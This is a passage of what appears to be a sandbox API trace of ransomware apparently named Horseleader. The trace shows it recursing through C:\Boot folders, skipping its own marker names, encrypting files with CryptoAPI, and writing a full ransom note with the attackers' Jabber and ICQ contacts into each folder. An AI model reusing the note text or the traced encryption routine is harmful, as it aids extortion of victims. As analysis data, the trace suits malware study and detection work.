ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.737] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.740] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\#Decrypt#.txt") returned 31 [0121.740] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\#Decrypt#.txt" (normalized: "c:\\boot\\fi-fi\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.740] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0121.740] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.742] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.742] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.742] CloseHandle (hObject=0x200) returned 1 [0121.743] 
GetProcessHeap () returned 0x780000 [0121.743] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.743] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="Fonts", cAlternateFileName="")) returned 1 [0121.743] lstrcmpiW (lpString1="Fonts", lpString2="Windows") returned -1 [0121.743] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts") returned 17 [0121.743] lstrcmpW (lpString1="Fonts", lpString2=".") returned 1 [0121.743] lstrcmpW (lpString1="Fonts", lpString2="..") returned 1 [0121.744] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\Fonts", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.744] GetProcessHeap () returned 0x780000 [0121.744] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.744] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\*") returned 19 [0121.744] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.773] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 
[0121.774] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\.") returned 19 [0121.774] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.774] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.774] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.774] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\..") returned 20 [0121.774] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.774] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.775] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0121.775] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Windows") returned -1 [0121.775] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned 30 [0121.775] StrStrIW (lpFirst="chs_boot.ttf", lpSrch=".horseleader") returned 0x0 [0121.775] lstrcmpW (lpString1="chs_boot.ttf", lpString2="#Decrypt#.txt") returned 1 [0121.775] lstrcmpW 
(lpString1="chs_boot.ttf", lpString2="_uninstalling_.png") returned 1 [0121.775] lstrlenW (lpString=".testttjffg") returned 11 [0121.776] StrStrW (lpFirst="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf", lpSrch=".testttjffg") returned 0x0 [0121.776] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.776] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.776] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.776] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0121.776] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Windows") returned -1 [0121.777] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned 30 [0121.777] StrStrIW (lpFirst="cht_boot.ttf", lpSrch=".horseleader") returned 0x0 [0121.777] lstrcmpW (lpString1="cht_boot.ttf", lpString2="#Decrypt#.txt") returned 1 [0121.777] lstrcmpW (lpString1="cht_boot.ttf", lpString2="_uninstalling_.png") returned 1 [0121.777] lstrlenW (lpString=".testttjffg") returned 11 [0121.777] StrStrW (lpFirst="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf", lpSrch=".testttjffg") 
returned 0x0 [0121.777] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.777] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.778] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.781] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0121.781] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Windows") returned -1 [0121.781] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned 30 [0121.781] StrStrIW (lpFirst="jpn_boot.ttf", lpSrch=".horseleader") returned 0x0 [0121.781] lstrcmpW (lpString1="jpn_boot.ttf", lpString2="#Decrypt#.txt") returned 1 [0121.781] lstrcmpW (lpString1="jpn_boot.ttf", lpString2="_uninstalling_.png") returned 1 [0121.781] lstrlenW (lpString=".testttjffg") returned 11 [0121.781] StrStrW (lpFirst="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf", lpSrch=".testttjffg") returned 0x0 [0121.781] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.782] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.782] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.782] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0121.782] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Windows") returned -1 [0121.782] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned 30 [0121.782] StrStrIW (lpFirst="kor_boot.ttf", lpSrch=".horseleader") returned 0x0 [0121.782] lstrcmpW (lpString1="kor_boot.ttf", lpString2="#Decrypt#.txt") returned 1 [0121.783] lstrcmpW (lpString1="kor_boot.ttf", lpString2="_uninstalling_.png") returned 1 [0121.783] lstrlenW (lpString=".testttjffg") returned 11 [0121.783] StrStrW (lpFirst="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf", lpSrch=".testttjffg") returned 0x0 [0121.783] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.783] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.783] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: 
"c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.783] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0121.784] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Windows") returned -1 [0121.784] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 31 [0121.784] StrStrIW (lpFirst="wgl4_boot.ttf", lpSrch=".horseleader") returned 0x0 [0121.784] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2="#Decrypt#.txt") returned 1 [0121.784] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2="_uninstalling_.png") returned 1 [0121.785] lstrlenW (lpString=".testttjffg") returned 11 [0121.785] StrStrW (lpFirst="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf", lpSrch=".testttjffg") returned 0x0 [0121.785] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.785] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.785] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff 
[0121.785] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0121.786] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.786] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\#Decrypt#.txt") returned 31 [0121.786] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\#Decrypt#.txt" (normalized: "c:\\boot\\fonts\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.789] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0121.790] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.791] lstrlenA (lpString="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") returned 1368 [0121.791] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.791] CloseHandle (hObject=0x200) returned 1 [0121.805] GetProcessHeap () returned 0x780000 [0121.805] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.805] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0121.805] lstrcmpiW (lpString1="fr-FR", lpString2="Windows") returned -1 [0121.805] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR") returned 17 [0121.806] lstrcmpW (lpString1="fr-FR", lpString2=".") returned 1 [0121.806] lstrcmpW (lpString1="fr-FR", lpString2="..") returned 1 [0121.806] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\fr-FR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.806] GetProcessHeap () returned 0x780000 [0121.806] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.806] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\*") returned 19 [0121.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.815] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.815] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\.") returned 19 [0121.815] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.815] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.815] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.815] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\..") returned 20 [0121.816] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.816] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.816] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, 
ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.816] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.816] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 33 [0121.816] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.816] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.816] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.816] lstrlenW (lpString=".testttjffg") returned 11 [0121.817] StrStrW (lpFirst="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.817] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.817] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.817] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.817] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, 
